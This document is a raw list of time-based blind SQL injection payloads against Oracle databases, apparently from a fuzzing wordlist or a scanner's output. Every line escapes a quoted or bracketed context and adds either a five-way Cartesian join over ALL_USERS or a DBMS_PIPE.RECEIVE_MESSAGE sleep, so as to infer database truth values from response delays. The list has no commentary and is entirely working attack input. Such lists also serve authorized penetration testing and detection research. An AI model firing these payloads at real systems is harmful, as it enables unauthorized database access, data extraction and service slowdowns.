-4879'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('HoSt' LIKE 'HoSt
-8469' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'AaJv' LIKE 'AaJv
-1803") OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("nbjr"="nbjr
-9058")) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("GKRi"="GKRi
-5329"))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("FYsJ"="FYsJ
-4444" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "fHUV"="fHUV
-4963") OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("Wotu" LIKE "Wotu
-2805")) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("TlWE" LIKE "TlWE
-4452"))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("wApb" LIKE "wApb
-4797" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "yXEg" LIKE "yXEg
-5239%') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
-8539%')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
-8994%'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
-6340%' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
-4382%00') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('GbgQ'='GbgQ
-5422%00' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'CHVb'='CHVb
-8027') WHERE 8486=8486 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-2714") WHERE 6885=6885 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-6216) WHERE 3252=3252 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-3539' WHERE 9937=9937 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-6466" WHERE 3579=3579 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-8623 WHERE 9227=9227 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
(SELECT (CASE WHEN (1225=1225) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(81)||CHR(79)||CHR(90),15) ELSE 1225 END) FROM DUAL)
(SELECT (CASE WHEN (1711=1711) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1711 END) FROM DUAL)
,(SELECT (CASE WHEN (2819=2819) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(68)||CHR(116)||CHR(104),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (3168=3168) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)